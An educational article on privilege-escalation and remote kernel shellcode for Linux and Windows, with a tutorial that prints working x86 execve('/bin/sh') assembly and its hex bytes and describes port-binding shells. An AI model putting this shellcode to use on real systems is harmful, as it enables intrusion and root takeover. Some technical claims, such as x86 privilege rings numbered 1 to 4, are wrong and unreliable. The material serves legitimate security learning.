Privilege escalation shellcode
The shellcodes of a kernel exploit and a user-land exploit are different in nature. The former is used for privilege escalation while the latter probably just steal the execution flow to his or her advantage. Remote kernel exploit shellcode share the characteristics of both world i.e. they steal the execution flow while they also perform a privilege escalation. The second difference originates from the fact that kernel exploit shellcodes are probably running in different context, the process context or in case of remote exploits interrupt context. In addition to these two differences, you do not need to worry for null bytes in your kernel exploit shellcode. For local exploits your shellcode will be smoothly compiled to your code and for remote exploits the shellcode is not readed as a string so you do need to worry that null bytes are interpreted as string termination character.
For privilege escalation a limited user needs stealing kernel path execution. X86 architecture has 4 levels of privileges as ring 1 to ring 4. Kernel codes are running in ring 1 and thus they have access to the full architecture instruction set. User applications are normally running under the ring 4 privilege. Except the limited instruction set, the application’s access to different system objects are explicitly defined by the operating system. For example an application with the super user privilege can access pretty much everything but a limited user is limited to what roles or privileges it has.
The logic behind a privilege escalation shellcode is simple; find the credential of the running process and append full privileges to its access token. In most of the times the previous logic can be implemented though sometimes we need to create a whole new set of privileges and spawn a child process using the created credentials. Implementation of this methodology on different operating systems is different, so we examine linux and windows in following sections. What is common on all kernel exploit shellcode is a recovery phase. As mentioned in the writing kernel exploits article, stealing a kernel path and triggering a vulnerability is not without cost. The stolen path may have acquired some Semaphore or lock or the exploit may have trashed some important kernel structure. Therefor to avoid a kernel crash and machine panic state we should recover our mess. In the last section I talk about remote privilege escalation shellcodes.
Linux privilege escalation
In linux world, privileges of a process are stored in a structure (process descriptor or process control block) that a pointer to it can be found at the bottom of the running process's stack. Getting a pointer to the bottom of the stack is as easy as masking the current stack pointer with the size of the stack which is typically 4KB or 8KB. Finding the exact offset to the access token can be done in two ways: either by using a kernel debugger and hardcoding the found offset or by using a heuristic approach. After that the privilege escalation is just the matter of writing 0 to the access token fields; 0 is the uid of the root account. If this method known as UID patching is not an option we can use system calls that create a whole new access token and append it to the process. Of course most of the times these system calls are not exported and you need to find their addresses in kernel in order to call them. In Linux searching for a specific system call can be done through /proc/kallsyms file which is accessible to any process.
Windows privilege escalation
Windows access management mechanism is more complex but it implements the same idea: every process has an access token and the privilege escalation is as easy as patching the access token. Access tokens do not contain just some ids like the linux uids. Access tokens contain complex objects as SIDs. In addition they also contain some privileges that are either defined as a bitmap or some ids. The structure that contains a pointer to the access token is EPROCESS structure (EPROCESS contains pointer to the access token, Process Control Block and etc.). A pointer to the EPROCESS can be found using the Kernel Processor Control Block (KPCB) which in turn can be found from Kernel Processor Control Region (KPCR). KPCR pointer can be found in FS segment or GS in case of Windows 64 bits. A kernel API also exists that does all the dirty works and gives us a reference to the EPROCESS. Again offset to the access token can be found using kernel debugger and hardcoding the value or using a heuristic approach. There is also a ZwCreateToken API which can be used in cases where patching is not an option. This API is undocumented and to use it you should find its address by searching the kernel memory.
Remote privilege escalation shellcode
For a remote kernel exploit you should find a vulnerable network driver. A driver often runs in an interrupt context. This means either you have to run your shellcode in an interrupt context or escape from that context. An interrupt context has the same level of privilege as a process context (the context which most system calls are running under it) but it cannot be interrupted with another interrupt or be rescheduled by operating system. Therefor most of the system calls because of this reason cannot be called in an interrupt context. These limits guide us to escape this context and go to the process context before executing our privilege escalation code. After our privilege escalation is done we probably should return a remote shell but how? The journey of our exploit to execute the shellcode has begun from a hardware interrupt (by the network card) so there is no supporting process that allows us to spawn a child process. To understand the concept, compare the situation with a local kernel exploit. In that situation you probably have issued a system call to a vulnerable path and then after privilege escalation you terminate the process execution normally because you have control over the running application. In a remote scenario however things are different. To escape the interrupt context for example you have to modify the system call table and wait for a process to call the system call. After the system call is issued, your privilege escalation code kicks in and elevates the privileges of the running process but the task is not done. You need to return to the caller, and run a code to spawn a shell for you and connect it to a port. To do that, you need to return to the user-land in a subtle manner that is not only safe but also leads to the execution of the rest of your shellcode. Using the IRET/IRETQ instruction and overwriting the caller address on the stack with the address of the rest of your shellcode (in the user-land), you can get the shell spawning and connect back code to be executed successfully. As you may notice our shellcode had 3 stages and in each stage just part of the shellcode is executed. On each stage the code for the next stage may be copied somewhere.
Building shellcode tutorial
What is shellcode?
Shellcode is a series of location independent bytes that are able to perform a certain task. In other words shellcode can be injected in any places in memory and run. You can input shellcode in your exploit and expect to fulfill your goal without worries about code dependencies. A shellcode is different from common compiled codes because in order to be injected it should have certain characteristics. First a shellcode should not have any null bytes because a shellcode usually is injected as a string data and a null byte plays the role of string termination character. Second a shellcode needs to be very small in order to be able to fit a small buffer.
How to write a shellcode?
Most hackers use previously built shellcode and by a framework like metasploit it is very easy to use common shellcodes for an exploit. Anyhow the need to writing shellcode for a professional hacker is undeniable. Shellcodes are developed using assembly language but any assembly code is not a shellcode according to the reason I explained at the beginning of this tutorial. Below is a basic local exploit shellcode to spawn a shell on linux:
BITS 32 jmp short two ; Jump down to the bottom for the call trick. one: ; int execve(const char *filename, char *const argv , char *const envp) pop ebx ; Ebx has the addr of the string. xor eax, eax ; Put 0 into eax. mov [ebx+7], al ; Null terminate the /bin/sh string. mov [ebx+8], ebx ; Put addr from ebx where the AAAA is. mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is. lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr. lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr. mov al, 11 ; Syscall #11 int 0x80 ; Do it. two: call one ; Use a call to get string address. db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed.
Shellcode example, taken from The Art of Exploitation book
This code to hackers is like a Picasso masterpiece for painters! First we have a short jump to the end of code. Seems absurd? This is a genius solution to avoid null bytes! We do not have data segment (because shell code should be location independent) in shellcode and to define a variable we should use the stack. To use the stack we cannot use the push '/bin/shXAAAABBBB' instruction because push is just for registers. Thus to save the variable on the stack we use the function calling mechanism. We know that when we call a function the next instruction address is saved on the stack. So we deliberately make a call to save the '/bin/shXAAAABBBB' address on the stack and then pop it in the next instruction. Later we set the null termination character of this string (on X) when the shellcode is executed. You may wonder why we need this text! '/bin/sh’ is the parameter for the spawn 11 system call. The XAAAABBBB is just reserved to be overwritten later in the code by mov instructions.
If you notice, to avoid null byte we used xor ax, ax instead of mov ax, 0. Also to make the shellcode smaller we used lea ecx, [ebx+8]. Because other option was to use two instructions to do the same thing:
add ebx, 8 mov ecx, bx
Assembling this code with nasm gives you the shell spawning bytes for a local exploit:
eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68
Shellcode bytes in hexadecimal
Remote Port binding shellcode
The above shellcode works fine for local exploits but for remote exploits it is useless since it will spawn a shell for the local terminal the program is executing. In order to develop a remote port binding shellcode you need to listen on a port and then duplicate the descriptor of that listener to the standard input, output for the spawned shell. These are done using the system call 102 for port binding (on linux) and the system call 63 to duplicate the descriptor to the standard input, output. The code to do so is not given to make the reader think about it but if you're curious refer to the Art Of Exploitation book. If the shellcode succeeds you can connect to the bound port and execute commands using netcat.